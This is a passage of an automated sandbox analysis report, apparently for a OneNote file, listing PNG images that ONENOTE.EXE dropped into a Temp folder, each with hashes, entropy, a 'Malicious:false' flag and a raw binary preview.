                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{CCD18F24-4AC6-40EA-B992-FC3C0FAE60CA}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16003
                                                                                                                                                    Entropy (8bit):7.959532793770661
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                    MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                    SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                    SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                    SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{D308D389-B65C-4791-9FE6-4A774F84B21B}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{D88B87E7-FAA9-4FC8-9E12-A7A3CEBC4506}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{D94710B0-069B-4BDC-838C-063CE0655F09}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{DDD5D422-ABC1-47FD-AF28-F7A792E1DC28}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{DEDEEA04-619C-4020-9769-7DE0CD14B160}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1924
                                                                                                                                                    Entropy (8bit):7.836744258175623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                    MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                    SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                    SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                    SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{E8D1F82C-4A0B-4003-A21F-3EE7CD266809}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{E9319BF7-E9E7-44AC-8EB5-3C0F312FAA30}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{EB5EC939-AF65-4B82-A15C-E8448EB7CF19}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2599
                                                                                                                                                    Entropy (8bit):7.903700862190034
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                    MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                    SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                    SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                    SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{EB65E805-D393-42D2-973F-27B805513FA7}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{EBE37427-A208-4DD1-95D0-0F47DE7E5B43}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{ED55F159-68F5-4966-B560-1E7FE8BFD1F8}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4190
                                                                                                                                                    Entropy (8bit):7.94161730428269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                    MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                    SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                    SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                    SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                    Malicious:false
